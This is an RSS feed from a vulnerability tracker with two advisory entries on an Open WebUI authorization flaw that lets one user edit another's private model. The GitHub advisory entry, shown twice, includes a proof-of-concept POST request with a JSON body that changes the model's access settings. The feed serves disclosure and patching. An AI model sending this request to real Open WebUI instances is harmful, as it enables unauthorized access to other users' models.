<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 06:13:53 +0000</lastBuildDate>
    <item>
      <title>CVE-2026-45345 — Open WebUI: Missing authorization check at the model update function - models from other users can be updated</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2026-45345</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; open-webui&lt;/p&gt;
&lt;p&gt;Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user&amp;#39;s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; open-webui&lt;/p&gt;
&lt;p&gt;Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user&amp;#39;s model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2026-45345</guid>
    </item>
    <item>
      <title>GHSA-gm54-m39w-grjp — Open WebUI missing authorization check at the model update function - models from other users can be updated</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-gm54-m39w-grjp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: open-webui&lt;/p&gt;
&lt;p&gt;### Summary
A user can modify another user&amp;#39;s model even if its visibility is set to `Private`.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.&lt;/p&gt;
&lt;p&gt;### Details / PoC
The user `Victim` created a private model with the visibility set to `private`: 
![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)&lt;/p&gt;
&lt;p&gt;The user `Attacker` can edit this model using the following POST request:
```
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers&lt;/p&gt;
&lt;p&gt;{&amp;#34;id&amp;#34;:&amp;#34;aaabraaa&amp;#34;,&amp;#34;base_model_id&amp;#34;:&amp;#34;gpt-4o-POC&amp;#34;,&amp;#34;name&amp;#34;:&amp;#34;testmodel&amp;#34;,&amp;#34;meta&amp;#34;:{&amp;#34;profile_image_url&amp;#34;:&amp;#34;/static/favicon.png&amp;#34;,&amp;#34;description&amp;#34;:&amp;#34;&amp;#34;,&amp;#34;capabilities&amp;#34;:{&amp;#34;vision&amp;#34;:true,&amp;#34;usage&amp;#34;:false,&amp;#34;citations&amp;#34;:true},&amp;#34;suggestion_prompts&amp;#34;:null,&amp;#34;tags&amp;#34;:[],&amp;#34;toolIds&amp;#34;:[&amp;#34;test&amp;#34;]},&amp;#34;params&amp;#34;:{},&amp;#34;user_id&amp;#34;:&amp;#34;565c82e6-083f-42bb-bf0f-a4e214cfb9ad&amp;#34;,&amp;#34;access_control&amp;#34;:{&amp;#34;read&amp;#34;:{&amp;#34;group_ids&amp;#34;:[],&amp;#34;user_ids&amp;#34;:[]},&amp;#34;write&amp;#34;:{&amp;#34;group_ids&amp;#34;:[],&amp;#34;user_ids&amp;#34;:[]}},&amp;#34;is_active&amp;#34;:true,&amp;#34;updated_at&amp;#34;:1737314575,&amp;#34;created_at&amp;#34;:1737121281}
```
Request / Response
![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)&lt;/p&gt;
&lt;p&gt;### Impact
A user can modify another user&amp;#39;s model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: open-webui&lt;/p&gt;
&lt;p&gt;### Summary
A user can modify another user&amp;#39;s model even if its visibility is set to `Private`.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.&lt;/p&gt;
&lt;p&gt;### Details / PoC
The user `Victim` created a private model with the visibility set to `private`: 
![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)&lt;/p&gt;
&lt;p&gt;The user `Attacker` can edit this model using the following POST request:
```
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers&lt;/p&gt;
&lt;p&gt;{&amp;#34;id&amp;#34;:&amp;#34;aaabraaa&amp;#34;,&amp;#34;base_model_id&amp;#34;:&amp;#34;gpt-4o-POC&amp;#34;,&amp;#34;name&amp;#34;:&amp;#34;testmodel&amp;#34;,&amp;#34;meta&amp;#34;:{&amp;#34;profile_image_url&amp;#34;:&amp;#34;/static/favicon.png&amp;#34;,&amp;#34;description&amp;#34;:&amp;#34;&amp;#34;,&amp;#34;capabilities&amp;#34;:{&amp;#34;vision&amp;#34;:true,&amp;#34;usage&amp;#34;:false,&amp;#34;citations&amp;#34;:true},&amp;#34;suggestion_prompts&amp;#34;:null,&amp;#34;tags&amp;#34;:[],&amp;#34;toolIds&amp;#34;:[&amp;#34;test&amp;#34;]},&amp;#34;params&amp;#34;:{},&amp;#34;user_id&amp;#34;:&amp;#34;565c82e6-083f-42bb-bf0f-a4e214cfb9ad&amp;#34;,&amp;#34;access_control&amp;#34;:{&amp;#34;read&amp;#34;:{&amp;#34;group_ids&amp;#34;:[],&amp;#34;user_ids&amp;#34;:[]},&amp;#34;write&amp;#34;:{&amp;#34;group_ids&amp;#34;:[],&amp;#34;user_ids&amp;#34;:[]}},&amp;#34;is_active&amp;#34;:true,&amp;#34;updated_at&amp;#34;:1737314575,&amp;#34;created_at&amp;#34;:1737121281}
```
Request / Response
![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)&lt;/p&gt;
&lt;p&gt;### Impact
A user can modify another user&amp;#39;s model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-gm54-m39w-grjp</guid>
    </item>
  </channel>
</rss>
